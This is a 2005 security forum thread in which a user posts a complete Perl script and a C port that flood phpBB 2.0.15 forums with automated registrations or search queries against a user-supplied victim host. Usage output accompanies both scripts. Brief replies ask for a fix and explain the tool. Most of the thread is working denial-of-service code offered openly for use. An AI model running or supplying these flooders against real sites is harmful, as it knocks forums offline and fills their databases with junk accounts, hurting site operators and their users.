Phpbb <= 2.0.15 Register Multiple Users Denial Of

Phpbb <= 2.0.15 Register Multiple Users Denial Of My first post!!!

#1 vismaya

Private

Group: Members
Posts: 3
Joined: 23-June 05

Posted 24 June 2005 - 05:14 AM

phpBB <= 2.0.15 Register Multiple Users Denial of

#!/usr/bin/perl
##  Name: NsT-phpBBDoS (Perl Version)
##  Copyright: Neo Security Team
##  Author: HaCkZaTaN
##  Ported: g30rg3_x
##  Date: 20/06/05
##  Description: NsT-phpBB DoS By HackZatan Ported tu perl By g30rg3_x
##               A Simple phpBB Registration And Search DoS Flooder.
## 
##  g30rg3x@neosecurity:/home/g30rg3x# perl NsT-phpBBDoS.pl
##  [+] 
##  [+] NsT-phpBBDoS v0.2 by HaCkZaTaN
##  [+] ported to Perl By g30rg3_x
##  [+] Neo Security Team
##  [+]
##  [+] Host |without http://www.| victimshost.com
##  [+] Path |example. /phpBB2/ or /| /phpBB2/
##  [+] Flood Type |1=Registration 2=Search| 1
##  [+] ..........................................................
##  [+] ..........................................................
##  [+] ..........................................................
##  [+] ..............................................
##  [+] The Socket Can't Connect To The Desired Host or the Host is MayBe DoSed
##  g30rg3x@neosecurity:/home/g30rg3x# echo "Let see how many users I have created"

use IO::Socket;

## Initialized X
$x = 0;

## Flood Variables Provided By User
print q(
NsT-phpBBDoS v0.2 by HaCkZaTaN
ported to Perl By g30rg3_x
Neo Security Team

);
print q(Host |without http://www.| );
$host = <STDIN>;
chop ($host);

print q(Path |example. /phpBB2/ or /| );
$pth = <STDIN>;
chop ($pth);

print q(Flood Type |1 = Registration, 2 = Search| );
$type = <STDIN>;
chop ($type);

## If Type Is Equals To 1 or Registration
if($type == 1){

## User Loop for 9999 loops (enough for Flood xDDDD)
while($x != 9999)
{

## Building User in base X
$uname = "username=NsT__" . "$x";

## Building User Mail in base X
$umail = "&email=NsT__" . "$x";

## Final String to Send
$postit = "$uname"."$umail"."%40neosecurityteam.net&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit";

## Posit Length
$lrg = length $postit;

## Connect Socket with Variables Provided By User
my $sock = new IO::Socket::INET (
                                 PeerAddr => "$host",
                                 PeerPort => "80",
                                 Proto => "tcp",
                                );
die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock;

## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums
print $sock "POST $pth"."profile.php HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);

## Print a "." for every loop
syswrite STDOUT, ".";

## Increment X in One for every Loop 
$x++;
}

## If Type Is Equals To 2 or Search
}
elsif ($type == 2){

## User Search Loop for 9999 loops (enough for Flood xDDDD)
while($x != 9999)
{
## Final Search String to Send
$postit = "search_keywords=Neo+Security+Team+Proof+of+Concept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";

## Posit Length
$lrg = length $postit;

## Connect Socket with Variables Provided By User
my $sock = new IO::Socket::INET (
                                 PeerAddr => "$host",
                                 PeerPort => "80",
                                 Proto => "tcp",
                                );
die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock;

## Sending Truth Socket The HTTP Commands For Send A BD Search Into phpBB Forums
print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);

## Print a "." for every loop
syswrite STDOUT, ".";

## Increment X in One for every Loop
$x++;
}
}else{
## STF??? What Do You Type
	die "Option not Allowed O_o???\n";
}

# milw0rm.com [2005-06-22]

#2 Blake

Former Commander In Chief

Group: Retired General
Posts: 7,317
Joined: 24-September 02

Posted 24 June 2005 - 07:28 AM

Welcome

Subscribe To Our RSS Feed For the Latest News from GovernmentSecurity.org
Would you like to earn money posting on GSO?

#3 thend

Private First Class

Group: Validating
Posts: 52
Joined: 22-August 03

Posted 25 June 2005 - 11:23 AM

Any fix for this

#4 pugrit

Corporal

Group: Members
Posts: 176
Joined: 17-March 04

Posted 25 June 2005 - 01:43 PM

there are still many old versions or phpbb around the net. and now the new version has an exploit. :P

soon no one will use phpbb becuase of this trend going on.

#5 myth

Master Sergeant

Group: Members
Posts: 408
Joined: 09-January 04

Posted 25 June 2005 - 04:35 PM

Unless your high profile for hackers (or skiddies), and you keep up-to-date, phpbb isnt a bad option...

although this bug wont place passwords at risk, its gonna be a pain to clean up the mess if your not patched....

But you'll spot the skiddies because they wont change the signatures. ....

#6 Tyler

Master Sergeant

Group: Members
Posts: 826
Joined: 20-June 05

Posted 25 June 2005 - 04:54 PM

Sorry, please dont think of me as a retard but i was wondering the title for this exploit is Register Multiple Users Denial of so i presume that you make multiple users with this exploit... but i am not 100% sure so if you can actually tell me what this exploit does so i can know if its worth compiling or not... thank you :)

and yeah... i agree there are like 30 xploits out there for phpbb boards... its getting rediculous :S

#7 myth

Master Sergeant

Group: Members
Posts: 408
Joined: 09-January 04

Posted 25 June 2005 - 06:25 PM

@Insanity

Taking a look at the code and its headers,

its uses vulnerabilities in the searching and registration functions in phpbb....

using the registration tactic, creates 9999 users, all with the same configs, but the loop can be changed.

seems the search just keep searching for users (9999 times), not sure if it registers....

Thats just from what i could see.....

Also, prints a '.' for every loop, so by default, if it works, your screen should be full of dots. 1 dot for every user

#8 Tyler

Master Sergeant

Group: Members
Posts: 826
Joined: 20-June 05

Posted 25 June 2005 - 06:49 PM

Alright thank you Myth1369, i did look at the header and code and saw somethign about searching and registering but i didn't quite get it... dotn know much about perl... i just know a bit about c and so its not quite the same for me... but thats not far off from what i thougth i jsut didn't get that it registered a bunch of users because i saw the search etc incorperated into the code therefore confusing me. but thanks for the quick reply Myth1368

#9 vismaya

Private

Group: Members
Posts: 3
Joined: 23-June 05

Posted 25 June 2005 - 11:05 PM

@Insanity here is C code for above exploit..

Program:  phpBB 2.0.15
Homepage:  http://www.phpbb.com
Vulnerable Versions: phpBB 2.0.15 & Lower versions
Risk: High Risk!!
Impact: Multiple DoS Vulnerabilities.

    -==phpBB 2.0.15 Multiple DoS Vulnerabilities ==-
---------------------------------------------------------

- Description
---------------------------------------------------------
phpBB is a high powered, fully scalable, and highly customizable
Open Source bulletin board package. phpBB has a user-friendly
interface, simple and straightforward administration panel, and
helpful FAQ. Based on the powerful PHP server language and your
choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers,
phpBB is the ideal free community solution for all web sites.

- Tested
---------------------------------------------------------
localhost & many forums

- Explotation
---------------------------------------------------------
profile.php << By registering as many users as you can.
search.php  << by searching in a way that the db couln't observe it.

- Exploit
---------------------------------------------------------
[C Source]
/*
  Name: NsT-phpBBDoS
  Copyright: NeoSecurityteam
  Author: HaCkZaTaN
  Date: 19/06/05
  Description: xD You must figure out the problem xD
  
  root@NeoSecurity:/home/hackzatan# pico NsT-phpBBDoS.c
  root@NeoSecurity:/home/hackzatan# gcc NsT-phpBBDoS.c -o NsT-phpBBDoS
  root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS
  [+] NsT-phpBBDoS v0.1 by HaCkZaTaN
  [+] NeoSecurityTeam
  [+] Dos has begun....[+]
  
  [*] Use: ./NsT-phpBBDoS <path> <search.php or profile.php> <Host>
  [*] Example: ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com
  root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com
  [+] NsT-phpBBDoS v0.1 by HaCkZaTaN
  [+] NeoSecurityTeam
  [+] Dos has begun....[+]
  
  .................................
  root@NeoSecurity:/home/hackzatan# echo "Let see how many users I have created"
  root@NeoSecurity:/home/hackzatan# set | grep MACHTYPE
  MACHTYPE=i486-slackware-linux-gnu
  root@NeoSecurity:/home/hackzatan#

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#ifdef WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#pragma pack(1)
#define WIN32_LEAN_AND_MEAN
#else
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#endif

#define __USE_GNU
#define _XOPEN_SOURCE

int Connection(char *, int);
void Write_In(int , char *, char *a, char *, int);
char Use(char *);

int main(int argc, char *argv[])
{
    int sock, x = 0;
    char *Path = argv[1], *Pro_Sea = argv[2], *Host = argv[3];

    puts("[+] NsT-phpBBDoS v0.1 by HaCkZaTaN");
    puts("[+] NeoSecurityTeam");
    puts("[+] Dos has begun....[+]\n");
    fflush(stdout);

    if(argc != 4) Use(argv[0]);

    while(1)
    {
           sock = Connection(Host,80);
           Write_In(sock, Path, Pro_Sea, Host, x);
           #ifndef WIN32
           shutdown(sock, SHUT_WR);
           close(sock);
           #else
           closesocket(sock);
           WSACleanup();
           #endif
           Pro_Sea = argv[2];
           x++;
    }
    //I don't think that it will get here =) 

    return 0;
}

int Connection(char *Host, int Port)
{
        #ifndef WIN32
        #define SOCKET int
        #else
        int error;
        WSADATA wsadata;
        error = WSAStartup(MAKEWORD(2, 2), &wsadata);

        if (error == SOCKET_ERROR)
        {
                  perror("Could Not Start Up Winsock!\n");
                  return;
        }

        #endif

        SOCKET sockfd;
        struct sockaddr_in sin;
        struct in_addr  *myaddr;
        struct hostent *h;
        
        if(Port <= 0 || Port > 65535)
         {
                  puts("[-] Invalid Port Number\n");
                  fflush(stdout);
                  exit(-1);
         }
        
        if((sockfd =  socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
        {
                    perror("socket() ");
                    fflush (stdout);
                    exit(-1);
        }

        if(isalpha(Host[0]))
        {
           if((h = gethostbyname(Host)) == NULL)
           {
                     perror("gethostbyname() ");
                     fflush (stdout);
                     exit(-1);
           }
        }
        else
        {
              myaddr=(struct in_addr*)malloc(sizeof(struct in_addr));
              myaddr->s_addr=inet_addr(Host);
              
              if((h = gethostbyaddr((char *) &myaddr, sizeof(myaddr), AF_INET)) != NULL)
              {
                     perror("gethostbyaddr() ");
                     fflush (stdout);
                     exit(-1);
              }
        }

        memset(&sin, 0, sizeof(sin));
        sin.sin_family = AF_INET;
        sin.sin_port = htons(Port);
        memcpy(&sin.sin_addr.s_addr, h->h_addr_list[0], h->h_length);

        if(connect(sockfd, (struct sockaddr *)&sin, sizeof(struct sockaddr_in)) < 0)
        {
                     perror("connect() ");
                     exit (-1);
        }

        return sockfd;
}

void Write_In(int sock, char *Path, char *Pro_Sea, char *Host, int x)
{
    char *str1 = (char *)malloc(4*BUFSIZ), *str2 = (char *)malloc(4*BUFSIZ);
    char *req0 = "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\r\n"
                 "Accept: */*\r\n"
                 "Accept-Language: en-us\r\n"
                 "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
                 "Accept encoding: gzip,deflate\r\n"
                 "Keep-Alive: 300\r\n"
                 "Proxy-Connection: keep-alive\r\n"
                 "Content-Type: application/x-www-form-urlencoded\r\n"
                 "Cache-Control: no-cache\r\n"
                 "Pragma: no-cache\r\n";
    char *Profile = "%40neosecurityteam.net&new_password=0123456&password_confirm=0123456&icq=&aim=&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=1&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit\r\n";
    char *Search  = "&search_terms=any&search_author=*&search_forum=-1&search_time=0&search_fields=all&search_cat=-1&sort_by=0&sort_dir=DESC&show_results=topics&return_chars=200\r\n";

    if(strcmp("profile.php", Pro_Sea) == 0) sprintf(str1, "username=NsT__%d&email=NsT__%d%s", x, x, Profile);
    else if(strcmp("search.php", Pro_Sea) == 0)
    {
               Pro_Sea = "search.php?mode=results";
               sprintf(str1, "search_keywords=Hack%d%s", x, Search);
    }
    else
    {
               puts("Sorry. Try making the right choice");
               exit(-1);
    }

    sprintf(str2, "POST %s%s HTTP/1.1\r\n"
                  "Host: %s\r\n"
                  "Referer: http://%s/\r\n%s"
                  "Content-Length: %d\r\n\r\n%s", Path, Pro_Sea, Host, Host, req0, strlen(str1), str1);
          
    write(sock, str2, strlen(str2));
    write(1, ".", 1);
    fflush(stdout);
}

char Use(char *program)
{
	fprintf(stderr,"[*] Use: %s <path> <search.php or profile.php> <Host>\n", program);
	fprintf(stderr,"[*] Example: %s /phpBB/ profile.php Victimshost.com\n", program);
	fflush(stdout);
	exit(-1);
}

/*

@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
'@@@@@''@@'@@@''''''''@@''@@@''@@
'@@'@@@@@@''@@@@@@@@@'''''@@@
'@@'''@@@@'''''''''@@@''''@@@
@@@@''''@@'@@@@@@@@@@''''@@@@@

*/

Page 1 of 1

You cannot start a new topic
You cannot reply to this topic

Forums: Phpbb <= 2.0.15 Register Multiple Users Denial Of - Forums